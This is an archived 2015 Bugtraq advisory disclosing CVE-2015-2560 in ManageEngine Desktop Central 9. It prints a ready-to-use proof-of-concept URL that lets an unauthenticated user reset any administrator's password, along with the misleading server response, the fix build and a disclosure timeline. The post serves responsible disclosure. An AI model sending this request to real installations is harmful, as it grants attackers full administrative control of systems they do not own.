lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 27 Mar 2015 04:16:37 GMT
From: root@...alhost.com
To: bugtraq@...urityfocus.com
Subject: Manage Engine Desktop Central 9 - CVE-2015-2560 - Unauthorised
 administrative password reset

A vulnerability exists in the Manage Engine Desktop Central 9 application that affects version (build 90130). This may affect earlier releases as well.

The vulnerability allows a remote unauthenticated user to change the password of any Manage Engine Desktop Central user with the ‘Administrator’ role (DCAdmin).
The following proof of concept URL changes the ‘admin’ user password to ‘admin3’. 

http://<IP>:8020/servlets/DCOperationsServlet?operation=addOrModifyUser&roleId=DCAdmin&userName=admin&password=admin3

The XML response suggests the user modification failed, however a user can perform a successful login with the supplied credentials:

<operation>
<operationstatus>Failure</operationstatus>
<message>Problem while modifying user admin in DC.</message>
</operation>

Complete control of the application can now be obtained by an unauthorised user.

Vulnerability remediation:
This vulnerability was fixed in Desktop Central build 90135. Refer to the vendor advisory for product update information and instructions.

Vendor advisory:
https://www.manageengine.com/products/desktop-central/unauthorized-admin-credential-modification.html

Disclosure timeline:

Vendor notification: 02/02/2015
Follow up with Vendor: 16/02/2015
Fixed released: 18/02/2015
CVE requested: 06/03/2015
CVE assigned: 20/03/2015
Vendor notification: 24/03/2015
Public disclosure: 27/03/2015

Powered by blists - more mailing lists